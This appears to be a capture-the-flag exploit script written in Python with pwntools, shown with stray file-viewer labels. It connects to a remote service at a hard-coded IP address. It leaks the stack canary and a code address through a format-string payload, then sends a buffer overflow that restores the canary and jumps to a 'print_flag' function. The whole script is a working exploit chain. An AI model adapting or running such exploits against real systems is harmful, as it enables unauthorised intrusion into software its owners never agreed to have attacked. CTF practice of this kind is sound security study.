28 lines
504 B
Python
28 lines
504 B
Python
#!/usr/bin/python3
|
|
|
|
from pwn import *
|
|
|
|
context.binary = target = ELF("./echo-app2", checksec=False)
|
|
# r = process()
|
|
r = remote("54.85.45.101", 8009)
|
|
|
|
# funcs
|
|
s = lambda a: r.sendline(a)
|
|
|
|
# leak
|
|
buf = b"%39$p.%42$p"
|
|
s(buf)
|
|
leaks = r.recvS(34).split(".")
|
|
canary = int(leaks[0], 16)
|
|
log.info("canary: %#x", canary)
|
|
target.address = int(leaks[1], 16)-0x15a1
|
|
log.info("main: %#x", target.address)
|
|
|
|
# buf
|
|
buf = b"A"*264
|
|
buf += p64(canary)
|
|
buf += p64(0)
|
|
buf += p64(target.sym.print_flag)
|
|
s(buf)
|
|
|
|
r.interactive() |